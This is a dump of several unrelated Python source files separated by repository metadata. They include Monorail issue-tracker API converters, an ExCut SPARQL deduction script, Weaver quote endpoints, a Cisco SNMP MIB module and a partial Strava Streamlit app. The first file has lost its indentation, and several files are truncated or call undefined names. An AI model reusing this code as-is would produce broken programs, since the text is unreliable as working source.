name=project.project_name,
externalId=project.project_name,
htmlLink='/p/%s/' % project.project_name,
summary=project.summary,
description=project.description,
role=role,
issuesConfig=convert_project_config(config))
def convert_project_config(config):
"""Convert Monorail ProjectIssueConfig PB to API ProjectIssueConfig PB."""
return api_pb2_v1.ProjectIssueConfig(
kind='monorail#projectIssueConfig',
restrictToKnown=config.restrict_to_known,
defaultColumns=config.default_col_spec.split(),
defaultSorting=config.default_sort_spec.split(),
statuses=[convert_status(s) for s in config.well_known_statuses],
labels=[convert_label(l) for l in config.well_known_labels],
prompts=[convert_template(t) for t in config.templates],
defaultPromptForMembers=config.default_template_for_developers,
defaultPromptForNonMembers=config.default_template_for_users)
def convert_status(status):
"""Convert Monorail StatusDef PB to API Status PB."""
return api_pb2_v1.Status(
status=status.status,
meansOpen=status.means_open,
description=status.status_docstring)
def convert_label(label):
"""Convert Monorail LabelDef PB to API Label PB."""
return api_pb2_v1.Label(
label=label.label,
description=label.label_docstring)
def convert_template(template):
"""Convert Monorail TemplateDef PB to API Prompt PB."""
return api_pb2_v1.Prompt(
name=template.name,
title=template.summary,
description=template.content,
titleMustBeEdited=template.summary_must_be_edited,
status=template.status,
labels=template.labels,
membersOnly=template.members_only,
defaultToMember=template.owner_defaults_to_member,
componentRequired=template.component_required)
def convert_person(user_id, cnxn, services, trap_exception=False):
"""Convert user id to API AtomPerson PB."""
if not user_id:
return None
try:
user = services.user.GetUser(cnxn, user_id)
except user_svc.NoSuchUserException as ex:
if trap_exception:
logging.warning(str(ex))
return None
else:
raise ex
days_ago = None
if user.last_visit_timestamp:
secs_ago = int(time.time()) - user.last_visit_timestamp
days_ago = secs_ago / framework_constants.SECS_PER_DAY
return api_pb2_v1.AtomPerson(
kind='monorail#issuePerson',
name=user.email,
htmlLink='https://%s/u/%d' % (framework_helpers.GetHostPort(), user_id),
last_visit_days_ago=days_ago,
email_bouncing=bool(user.email_bounce_timestamp),
vacation_message=user.vacation_message)
def convert_issue_ids(issue_ids, mar, services):
"""Convert global issue ids to API IssueRef PB."""
# missed issue ids are filtered out.
issues = services.issue.GetIssues(mar.cnxn, issue_ids)
result = []
for issue in issues:
issue_ref = api_pb2_v1.IssueRef(
issueId=issue.local_id,
projectId=issue.project_name,
kind='monorail#issueRef')
result.append(issue_ref)
return result
def convert_issueref_pbs(issueref_pbs, mar, services):
"""Convert API IssueRef PBs to global issue ids."""
if issueref_pbs:
result = []
for ir in issueref_pbs:
project_id = mar.project_id
if ir.projectId:
project = services.project.GetProjectByName(
mar.cnxn, ir.projectId)
if project:
project_id = project.project_id
try:
issue = services.issue.GetIssueByLocalID(
mar.cnxn, project_id, ir.issueId)
result.append(issue.issue_id)
except issue_svc.NoSuchIssueException:
logging.warning(
'Issue (%s:%d) does not exist.' % (ir.projectId, ir.issueId))
return result
else:
return None
def convert_issue(cls, issue, mar, services):
"""Convert Monorail Issue PB to API IssuesGetInsertResponse."""
config = services.config.GetProjectConfig(mar.cnxn, issue.project_id)
granted_perms = tracker_bizobj.GetGrantedPerms(
issue, mar.auth.effective_ids, config)
issue_project = services.project.GetProject(mar.cnxn, issue.project_id)
component_list = []
for cd in config.component_defs:
cid = cd.component_id
if cid in issue.component_ids:
component_list.append(cd.path)
cc_list = [convert_person(p, mar.cnxn, services) for p in issue.cc_ids]
cc_list = [p for p in cc_list if p is not None]
field_values_list = []
field_id_dict = {
fd.field_id: fd.field_name for fd in config.field_defs}
for fv in issue.field_values:
field_name = field_id_dict.get(fv.field_id)
if not field_name:
logging.warning('Custom field %d of project %s does not exist',
fv.field_id, issue_project.project_name)
continue
val = None
if fv.user_id:
val = _get_user_email(
services.user, mar.cnxn, fv.user_id)
elif fv.str_value:
val = fv.str_value
elif fv.int_value:
val = str(fv.int_value)
new_fv = api_pb2_v1.FieldValue(
fieldName=field_name,
fieldValue=val,
derived=fv.derived)
field_values_list.append(new_fv)
resp = cls(
kind='monorail#issue',
id=issue.local_id,
title=issue.summary,
summary=issue.summary,
projectId=issue_project.project_name,
stars=issue.star_count,
starred=services.issue_star.IsItemStarredBy(
mar.cnxn, issue.issue_id, mar.auth.user_id),
status=issue.status,
state=(api_pb2_v1.IssueState.open if
tracker_helpers.MeansOpenInProject(
tracker_bizobj.GetStatus(issue), config)
else api_pb2_v1.IssueState.closed),
labels=issue.labels,
components=component_list,
author=convert_person(issue.reporter_id, mar.cnxn, services),
owner=convert_person(issue.owner_id, mar.cnxn, services),
cc=cc_list,
updated=datetime.datetime.fromtimestamp(issue.modified_timestamp),
published=datetime.datetime.fromtimestamp(issue.opened_timestamp),
blockedOn=convert_issue_ids(issue.blocked_on_iids, mar, services),
blocking=convert_issue_ids(issue.blocking_iids, mar, services),
canComment=permissions.CanCommentIssue(
mar.auth.effective_ids, mar.perms, issue_project, issue,
granted_perms=granted_perms),
canEdit=permissions.CanEditIssue(
mar.auth.effective_ids, mar.perms, issue_project, issue,
granted_perms=granted_perms),
fieldValues=field_values_list)
if issue.closed_timestamp > 0:
resp.closed = datetime.datetime.fromtimestamp(issue.closed_timestamp)
if issue.merged_into:
    resp.mergedInto = convert_issue_ids([issue.merged_into], mar, services)[0]
if issue.owner_modified_timestamp:
resp.owner_modified = datetime.datetime.fromtimestamp(
issue.owner_modified_timestamp)
if issue.status_modified_timestamp:
resp.status_modified = datetime.datetime.fromtimestamp(
issue.status_modified_timestamp)
if issue.component_modified_timestamp:
resp.component_modified = datetime.datetime.fromtimestamp(
issue.component_modified_timestamp)
return resp
def convert_comment(issue, comment, mar, services, granted_perms):
"""Convert Monorail IssueComment PB to API IssueCommentWrapper."""
can_delete = permissions.CanDelete(
mar.auth.user_id, mar.auth.effective_ids, mar.perms,
comment.deleted_by, comment.user_id, mar.project,
permissions.GetRestrictions(issue), granted_perms=granted_perms)
return api_pb2_v1.IssueCommentWrapper(
attachments=[convert_attachment(a) for a in comment.attachments],
author=convert_person(comment.user_id, mar.cnxn, services,
trap_exception=True),
canDelete=can_delete,
content=comment.content,
deletedBy=convert_person(comment.deleted_by, mar.cnxn, services,
trap_exception=True),
id=comment.sequence,
published=datetime.datetime.fromtimestamp(comment.timestamp),
updates=convert_amendments(issue, comment.amendments, mar, services),
kind='monorail#issueComment')
def convert_attachment(attachment):
"""Convert Monorail Attachment PB to API Attachment."""
return api_pb2_v1.Attachment(
attachmentId=attachment.attachment_id,
fileName=attachment.filename,
fileSize=attachment.filesize,
mimetype=attachment.mimetype,
isDeleted=attachment.deleted)
def convert_amendments(issue, amendments, mar, services):
"""Convert a list of Monorail Amendment PBs to API Update."""
result = api_pb2_v1.Update(kind='monorail#issueCommentUpdate')
for amendment in amendments:
if amendment.field == tracker_pb2.FieldID.SUMMARY:
result.summary = amendment.newvalue
elif amendment.field == tracker_pb2.FieldID.STATUS:
result.status = amendment.newvalue
elif amendment.field == tracker_pb2.FieldID.OWNER:
if len(amendment.added_user_ids) == 0:
result.owner = framework_constants.NO_USER_NAME
else:
result.owner = _get_user_email(
services.user, mar.cnxn, amendment.added_user_ids[0])
elif amendment.field == tracker_pb2.FieldID.LABELS:
result.labels = amendment.newvalue.split()
elif amendment.field == tracker_pb2.FieldID.CC:
for user_id in amendment.added_user_ids:
user_email = _get_user_email(
services.user, mar.cnxn, user_id)
result.cc.append(user_email)
for user_id in amendment.removed_user_ids:
user_email = _get_user_email(
services.user, mar.cnxn, user_id)
result.cc.append('-%s' % user_email)
elif amendment.field == tracker_pb2.FieldID.BLOCKEDON:
result.blockedOn = _append_project(
amendment.newvalue, issue.project_name)
elif amendment.field == tracker_pb2.FieldID.BLOCKING:
result.blocking = _append_project(
amendment.newvalue, issue.project_name)
elif amendment.field == tracker_pb2.FieldID.MERGEDINTO:
result.mergedInto = amendment.newvalue
elif amendment.field == tracker_pb2.FieldID.COMPONENTS:
result.components = amendment.newvalue.split()
elif amendment.field == tracker_pb2.FieldID.CUSTOM:
fv = api_pb2_v1.FieldValue()
fv.fieldName = amendment.custom_field_name
fv.fieldValue = amendment.newvalue
result.fieldValues.append(fv)
return result
def _get_user_email(user_service, cnxn, user_id):
"""Get user email."""
try:
user_email = user_service.LookupUserEmail(
cnxn, user_id)
if not user_email:
user_email = framework_constants.DELETED_USER_NAME
except user_svc.NoSuchUserException:
user_email = framework_constants.DELETED_USER_NAME
return user_email
def _append_project(issue_ids, project_name):
"""Append project name to convert <id> to <project>:<id> format."""
result = []
id_list = issue_ids.split()
for id_str in id_list:
if ':' in id_str:
result.append(id_str)
# '-' means this issue is being removed
elif id_str.startswith('-'):
result.append('-%s:%s' % (project_name, id_str[1:]))
else:
result.append('%s:%s' % (project_name, id_str))
return result
def split_remove_add(item_list):
"""Split one list of items into two: items to add and items to remove."""
list_to_add = []
list_to_remove = []
for item in item_list:
if item.startswith('-'):
list_to_remove.append(item[1:])
else:
list_to_add.append(item)
return list_to_add, list_to_remove
# TODO(sheyang): batch the SQL queries to fetch projects/issues.
def issue_global_ids(project_local_id_pairs, project_id, mar, services):
"""Find global issues ids given <project_name>:<issue_local_id> pairs."""
result = []
for pair in project_local_id_pairs:
issue_project_id = None
local_id = None
if ':' in pair:
pair_ary = pair.split(':')
project_name = pair_ary[0]
local_id = int(pair_ary[1])
project = services.project.GetProjectByName(mar.cnxn, project_name)
if not project:
raise project_svc.NoSuchProjectException(
'Project %s does not exist' % project_name)
issue_project_id = project.project_id
else:
issue_project_id = project_id
local_id = int(pair)
result.append(
services.issue.LookupIssueID(mar.cnxn, issue_project_id, local_id))
return result
def convert_group_settings(group_name, setting):
"""Convert UserGroupSettings to UserGroupSettingsWrapper."""
return api_pb2_v1.UserGroupSettingsWrapper(
groupName=group_name,
who_can_view_members=setting.who_can_view_members,
ext_group_type=setting.ext_group_type,
last_sync_time=setting.last_sync_time)
def convert_component_def(cd, mar, services):
"""Convert ComponentDef PB to Component PB."""
project_name = services.project.LookupProjectNames(
mar.cnxn, [cd.project_id])[cd.project_id]
user_ids = set()
user_ids.update(
cd.admin_ids + cd.cc_ids + [cd.creator_id] + [cd.modifier_id])
user_names_dict = services.user.LookupUserEmails(mar.cnxn, list(user_ids))
component = api_pb2_v1.Component(
componentId=cd.component_id,
projectName=project_name,
componentPath=cd.path,
description=cd.docstring,
admin=sorted([user_names_dict[uid] for uid in cd.admin_ids]),
cc=sorted([user_names_dict[uid] for uid in cd.cc_ids]),
deprecated=cd.deprecated)
if cd.created:
component.created = datetime.datetime.fromtimestamp(cd.created)
component.creator = user_names_dict[cd.creator_id]
if cd.modified:
component.modified = datetime.datetime.fromtimestamp(cd.modified)
component.modifier = user_names_dict[cd.modifier_id]
return component
def convert_component_ids(config, component_names):
"""Convert a list of component names to ids."""
component_names_lower = [name.lower() for name in component_names]
result = []
for cd in config.component_defs:
cpath = cd.path
if cpath.lower() in component_names_lower:
result.append(cd.component_id)
return result
def convert_field_values(field_values, mar, services):
"""Convert user passed in field value list to FieldValue PB, or labels."""
fv_list_add = []
fv_list_remove = []
fv_list_clear = []
label_list_add = []
label_list_remove = []
field_name_dict = {
fd.field_name: fd for fd in mar.config.field_defs}
for fv in field_values:
field_def = field_name_dict.get(fv.fieldName)
if not field_def:
      logging.warning('Custom field %s does not exist', fv.fieldName)
continue
if fv.operator == api_pb2_v1.FieldValueOperator.clear:
fv_list_clear.append(field_def.field_id)
continue
# Enum fields are stored as labels
if field_def.field_type == tracker_pb2.FieldTypes.ENUM_TYPE:
raw_val = '%s-%s' % (fv.fieldName, fv.fieldValue)
if fv.operator == api_pb2_v1.FieldValueOperator.remove:
label_list_remove.append(raw_val)
elif fv.operator == api_pb2_v1.FieldValueOperator.add:
label_list_add.append(raw_val)
else:
        logging.warning('Unsupported field value operator %s', fv.operator)
else:
new_fv = tracker_pb2.FieldValue(
field_id=field_def.field_id)
if field_def.field_type == tracker_pb2.FieldTypes.USER_TYPE:
try:
new_fv.user_id = services.user.LookupUserID(mar.cnxn, fv.fieldValue)
except user_svc.NoSuchUserException:
new_fv.user_id = 0
elif field_def.field_type == tracker_pb2.FieldTypes.STR_TYPE:
new_fv.str_value = fv.fieldValue
elif field_def.field_type == tracker_pb2.FieldTypes.INT_TYPE:
new_fv.int_value = int(fv.fieldValue)
else:
logging.warning(
'Unsupported field value type %s', field_def.field_type)
if fv.operator == api_pb2_v1.FieldValueOperator.remove:
fv_list_remove.append(new_fv)
elif fv.operator == api_pb2_v1.FieldValueOperator.add:
fv_list_add.append(new_fv)
else:
        logging.warning('Unsupported field value operator %s', fv.operator)
return (fv_list_add, fv_list_remove, fv_list_clear,
label_list_add, label_list_remove)
| 35.485477 | 78 | 0.716265 |
6a2fe9fc55d86e49bc69dd057bc5f300e14dbe22
| 10,782 |
py
|
Python
|
excut/feedback/rulebased_deduction/deduction_engine_extended.py
|
mhmgad/ExCut
|
09e943a23207381de3c3a9e6f70015882b8ec4af
|
[
"Apache-2.0"
] | 5 |
2020-11-17T19:59:49.000Z
|
2021-09-23T23:10:39.000Z
|
excut/feedback/rulebased_deduction/deduction_engine_extended.py
|
mhmgad/ExCut
|
09e943a23207381de3c3a9e6f70015882b8ec4af
|
[
"Apache-2.0"
] | null | null | null |
excut/feedback/rulebased_deduction/deduction_engine_extended.py
|
mhmgad/ExCut
|
09e943a23207381de3c3a9e6f70015882b8ec4af
|
[
"Apache-2.0"
] | null | null | null |
"""
This module contains the rule-based inference (rulebased_deduction engine)
"""
import itertools
from collections import defaultdict
from itertools import chain
from excut.explanations_mining.descriptions import dump_explanations_to_file
from excut.explanations_mining.descriptions_new import Description2, Atom, load_from_file
from excut.explanations_mining.explaining_engines_extended import PathBasedClustersExplainerExtended
from excut.explanations_mining.simple_miner.description_miner_extended import DescriptionMinerExtended, ExplanationStructure
from excut.kg.kg_query_interface_extended import EndPointKGQueryInterfaceExtended, KGQueryInterfaceExtended
from excut.kg.kg_indexing import Indexer
from excut.kg.utils.data_formating import n3_repr
from excut.utils.logging import logger
from excut.kg.utils.Constants import DEFUALT_AUX_RELATION
from excut.clustering import target_entities as tes
def dump_predictions_map(per_var_predictions, out_filepath, triple_format=True, topk=-1, with_weight=True,
with_description=False, quality='x_coverage'):
"""
    Write the predictions to two files: one human-readable, the other with a
    .parsable extension that can be parsed in Python.

    :param per_var_predictions: dict mapping each variable to its list of predictions
    :param out_filepath: base path of the output files
    :param triple_format: write each prediction as an n3 triple instead of raw str()
    :param topk: keep only the top-k predictions per variable (-1 keeps all)
    :param with_weight: append each prediction's quality score to the line
    :param with_description: append the source description to the line
    :param quality: quality measure used for the weight and the file suffix
    :return: path of the human-readable output file
"""
out_file_parsable = out_filepath + '.parsable'
out_filepath_with_type = out_filepath + ('.%s' % quality if len(quality) > 0 else '')
with open(out_filepath_with_type, 'w') as out_file:
for var, predictions in per_var_predictions.items():
if topk > 0:
predictions = predictions[:topk]
for p in predictions:
if triple_format:
# I only output normalized_coverage
out_str = n3_repr(p.triple) + ('\t%f' % p.get_quality(quality) if with_weight else '') + (
'\t%s' % p.source_description if with_description else '')
else:
out_str = str(p)
out_file.write(out_str)
out_file.write('\n')
with open(out_file_parsable + ('.%s' % quality if len(quality) > 0 else ''), 'w') as out_file:
out_file.write('\n'.join(
map(str, chain.from_iterable(map(lambda l: l[:topk] if topk > 0 else l, per_var_predictions.values())))))
return out_filepath_with_type
if __name__ == '__main__':
target_entities=tes.load_from_file('/scratch/GW/pool0/gadelrab/ExDEC/data/yago/yago_art_3_4k.tsv')
vos_executer = EndPointKGQueryInterfaceExtended('http://halimede:8890/sparql',
['http://yago-expr.org', 'http://yago-expr.org.types'],
labels_identifier='http://yago-expr.org.labels')
explainer=PathBasedClustersExplainerExtended(vos_executer, language_bias={'max_length': 4, 'structure': ExplanationStructure.TREE})
explans=explainer.explain(target_entities,
output_file='/scratch/GW/pool0/gadelrab/ExDEC/tmp/explanations_tree.txt')
ded = SparqlBasedDeductionEngineExtended(vos_executer)
per_var_predictions = ded.infer(explans, target_entities,
output_filepath='/scratch/GW/pool0/gadelrab/ExDEC/tmp/predictions_tree.tsv')
logger.info("Total variables with predictions subjects: %i", len(per_var_predictions))
| 42.785714 | 147 | 0.667501 |
6a3060eba97a54372d78e04129b03dceb1e1d40e
| 916 |
py
|
Python
|
dataloader/viperlist_train.py
|
urasakikeisuke/rigidmask
|
4bb781102218dfd11efa767e2d0ba987d9949fd1
|
[
"MIT"
] | 138 |
2021-01-12T03:02:04.000Z
|
2022-03-30T07:14:15.000Z
|
dataloader/viperlist_train.py
|
urasakikeisuke/rigidmask
|
4bb781102218dfd11efa767e2d0ba987d9949fd1
|
[
"MIT"
] | 12 |
2021-02-02T14:19:30.000Z
|
2022-03-28T01:23:44.000Z
|
dataloader/viperlist_train.py
|
urasakikeisuke/rigidmask
|
4bb781102218dfd11efa767e2d0ba987d9949fd1
|
[
"MIT"
] | 14 |
2021-01-13T01:31:34.000Z
|
2022-01-30T14:48:06.000Z
|
import torch.utils.data as data
from PIL import Image
import os
import os.path
import numpy as np
import pdb
import glob
IMG_EXTENSIONS = [
'.jpg', '.JPG', '.jpeg', '.JPEG',
'.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',
]
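# The rest of this dataloader was truncated in the dump. The helper below is
# the companion these extension lists are conventionally paired with; it is a
# reconstruction, not necessarily the repository's original code.
def is_image_file(filename):
    return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)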
| 24.756757 | 97 | 0.634279 |
6a30d65ddcf953ceadcc9809b51e37283b427dac
| 49 |
py
|
Python
|
floodcomparison/__init__.py
|
jsosa/floodcomparison
|
c6662ae9142b4e89c6c05f93adaba49c5d8e4314
|
[
"Apache-2.0"
] | null | null | null |
floodcomparison/__init__.py
|
jsosa/floodcomparison
|
c6662ae9142b4e89c6c05f93adaba49c5d8e4314
|
[
"Apache-2.0"
] | null | null | null |
floodcomparison/__init__.py
|
jsosa/floodcomparison
|
c6662ae9142b4e89c6c05f93adaba49c5d8e4314
|
[
"Apache-2.0"
] | null | null | null |
from floodcomparison.core import floodcomparison
| 24.5 | 48 | 0.897959 |
6a315f9411feef2bef3f2cfb2fab79f19fe80e02
| 7,842 |
py
|
Python
|
weaver/wps_restapi/quotation/quotes.py
|
crim-ca/weaver
|
107fec5e19f20b77061b9405a764da911d2db8a2
|
[
"Apache-2.0"
] | 16 |
2019-03-18T12:23:05.000Z
|
2022-02-25T00:39:11.000Z
|
weaver/wps_restapi/quotation/quotes.py
|
crim-ca/weaver
|
107fec5e19f20b77061b9405a764da911d2db8a2
|
[
"Apache-2.0"
] | 346 |
2019-03-06T21:05:04.000Z
|
2022-03-31T13:38:37.000Z
|
weaver/wps_restapi/quotation/quotes.py
|
crim-ca/weaver
|
107fec5e19f20b77061b9405a764da911d2db8a2
|
[
"Apache-2.0"
] | 5 |
2019-03-15T01:38:28.000Z
|
2021-11-11T15:38:43.000Z
|
import logging
import random
from datetime import timedelta
from typing import TYPE_CHECKING
from duration import to_iso8601
from pyramid.httpexceptions import HTTPBadRequest, HTTPCreated, HTTPNotFound, HTTPOk
from weaver import sort
from weaver.config import WEAVER_CONFIGURATION_ADES, WEAVER_CONFIGURATION_EMS, get_weaver_configuration
from weaver.database import get_db
from weaver.datatype import Bill, Quote
from weaver.exceptions import ProcessNotFound, QuoteNotFound, log_unhandled_exceptions
from weaver.formats import OUTPUT_FORMAT_JSON
from weaver.processes.types import PROCESS_APPLICATION, PROCESS_WORKFLOW
from weaver.processes.wps_package import get_package_workflow_steps, get_process_location
from weaver.store.base import StoreBills, StoreQuotes
from weaver.utils import get_settings, get_weaver_url
from weaver.wps_restapi import swagger_definitions as sd
from weaver.wps_restapi.processes.processes import submit_local_job
if TYPE_CHECKING:
from weaver.datatype import Process
from weaver.typedefs import JSON
LOGGER = logging.getLogger(__name__)
def process_quote_estimator(process): # noqa: E811
# type: (Process) -> JSON
"""
Simulate quote parameters for the process execution.
:param process: instance of :class:`weaver.datatype.Process` for which to evaluate the quote.
:return: dict of {price, currency, estimatedTime} values for the process quote.
"""
# TODO: replace by some fancy ml technique or something?
price = random.uniform(0, 10) # nosec
currency = "CAD"
estimated_time = to_iso8601(timedelta(minutes=random.uniform(5, 60))) # nosec
return {"price": price, "currency": currency, "estimatedTime": estimated_time}
| 43.810056 | 119 | 0.718822 |
6a31701fc7c063904134f212988d1c0c79559f82
| 6,722 |
py
|
Python
|
pysnmp/CISCO-VSI-CONTROLLER-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 11 |
2021-02-02T16:27:16.000Z
|
2021-08-31T06:22:49.000Z
|
pysnmp/CISCO-VSI-CONTROLLER-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 75 |
2021-02-24T17:30:31.000Z
|
2021-12-08T00:01:18.000Z
|
pysnmp/CISCO-VSI-CONTROLLER-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10 |
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module CISCO-VSI-CONTROLLER-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-VSI-CONTROLLER-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 18:03:33 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection, ValueRangeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueRangeConstraint", "SingleValueConstraint")
ciscoMgmt, = mibBuilder.importSymbols("CISCO-SMI", "ciscoMgmt")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
ObjectIdentity, NotificationType, Gauge32, Bits, Unsigned32, IpAddress, MibIdentifier, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, Counter32, Counter64, iso, Integer32, TimeTicks = mibBuilder.importSymbols("SNMPv2-SMI", "ObjectIdentity", "NotificationType", "Gauge32", "Bits", "Unsigned32", "IpAddress", "MibIdentifier", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "Counter32", "Counter64", "iso", "Integer32", "TimeTicks")
TextualConvention, RowStatus, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "RowStatus", "DisplayString")
ciscoVSIControllerMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 9, 9, 141))
if mibBuilder.loadTexts: ciscoVSIControllerMIB.setLastUpdated('9906080000Z')
if mibBuilder.loadTexts: ciscoVSIControllerMIB.setOrganization('Cisco Systems, Inc.')
cvcMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 141, 1))
cvcConfController = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1))
cvcConfTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1), )
if mibBuilder.loadTexts: cvcConfTable.setStatus('current')
cvcConfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1), ).setIndexNames((0, "CISCO-VSI-CONTROLLER-MIB", "cvcConfControllerID"))
if mibBuilder.loadTexts: cvcConfEntry.setStatus('current')
cvcConfControllerID = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647)))
if mibBuilder.loadTexts: cvcConfControllerID.setStatus('current')
cvcConfControllerType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1, 2), CvcControllerType()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cvcConfControllerType.setStatus('current')
cvcConfControllerShelfLocation = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1, 3), CvcControllerShelfLocation()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cvcConfControllerShelfLocation.setStatus('current')
cvcConfControllerLocation = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cvcConfControllerLocation.setStatus('current')
cvcConfControllerName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1, 5), DisplayString()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cvcConfControllerName.setStatus('current')
cvcConfVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 4095))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cvcConfVpi.setStatus('current')
cvcConfVci = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(32, 65535))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cvcConfVci.setStatus('current')
cvcConfRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 141, 1, 1, 1, 1, 8), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: cvcConfRowStatus.setStatus('current')
cvcMIBConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 141, 3))
cvcMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 141, 3, 1))
cvcMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 141, 3, 2))
cvcMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 141, 3, 1, 1)).setObjects(("CISCO-VSI-CONTROLLER-MIB", "cvcConfGroup"), ("CISCO-VSI-CONTROLLER-MIB", "cvcConfGroupExternal"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cvcMIBCompliance = cvcMIBCompliance.setStatus('current')
cvcConfGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 141, 3, 2, 1)).setObjects(("CISCO-VSI-CONTROLLER-MIB", "cvcConfControllerType"), ("CISCO-VSI-CONTROLLER-MIB", "cvcConfControllerShelfLocation"), ("CISCO-VSI-CONTROLLER-MIB", "cvcConfControllerLocation"), ("CISCO-VSI-CONTROLLER-MIB", "cvcConfControllerName"), ("CISCO-VSI-CONTROLLER-MIB", "cvcConfRowStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cvcConfGroup = cvcConfGroup.setStatus('current')
cvcConfGroupExternal = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 141, 3, 2, 2)).setObjects(("CISCO-VSI-CONTROLLER-MIB", "cvcConfVpi"), ("CISCO-VSI-CONTROLLER-MIB", "cvcConfVci"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cvcConfGroupExternal = cvcConfGroupExternal.setStatus('current')
mibBuilder.exportSymbols("CISCO-VSI-CONTROLLER-MIB", cvcConfTable=cvcConfTable, cvcMIBGroups=cvcMIBGroups, cvcConfControllerType=cvcConfControllerType, cvcConfVpi=cvcConfVpi, CvcControllerShelfLocation=CvcControllerShelfLocation, cvcConfControllerLocation=cvcConfControllerLocation, cvcConfController=cvcConfController, cvcConfControllerName=cvcConfControllerName, PYSNMP_MODULE_ID=ciscoVSIControllerMIB, cvcConfControllerID=cvcConfControllerID, cvcConfGroupExternal=cvcConfGroupExternal, cvcMIBCompliance=cvcMIBCompliance, cvcConfEntry=cvcConfEntry, ciscoVSIControllerMIB=ciscoVSIControllerMIB, cvcConfControllerShelfLocation=cvcConfControllerShelfLocation, cvcConfRowStatus=cvcConfRowStatus, cvcConfGroup=cvcConfGroup, CvcControllerType=CvcControllerType, cvcConfVci=cvcConfVci, cvcMIBObjects=cvcMIBObjects, cvcMIBCompliances=cvcMIBCompliances, cvcMIBConformance=cvcMIBConformance)
| 105.03125 | 883 | 0.759298 |
6a328e84b47f7a5de237d63ba7bea1c7be663611
| 6,282 |
py
|
Python
|
strava.py
|
AartGoossens/streamlit-activity-viewer
|
b43f157d8bee596908c4f2222be9bb0d8bd9b9e8
|
[
"MIT"
] | 4 |
2021-05-21T11:34:00.000Z
|
2022-02-17T18:22:06.000Z
|
strava.py
|
AartGoossens/streamlit-activity-viewer
|
b43f157d8bee596908c4f2222be9bb0d8bd9b9e8
|
[
"MIT"
] | null | null | null |
strava.py
|
AartGoossens/streamlit-activity-viewer
|
b43f157d8bee596908c4f2222be9bb0d8bd9b9e8
|
[
"MIT"
] | null | null | null |
import base64
import os
import arrow
import httpx
import streamlit as st
import sweat
from bokeh.models.widgets import Div
APP_URL = os.environ["APP_URL"]
STRAVA_CLIENT_ID = os.environ["STRAVA_CLIENT_ID"]
STRAVA_CLIENT_SECRET = os.environ["STRAVA_CLIENT_SECRET"]
STRAVA_AUTHORIZATION_URL = "https://www.strava.com/oauth/authorize"
STRAVA_API_BASE_URL = "https://www.strava.com/api/v3"
DEFAULT_ACTIVITY_LABEL = "NO_ACTIVITY_SELECTED"
STRAVA_ORANGE = "#fc4c02"
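# The helper functions were truncated in this dump. A hedged sketch of the
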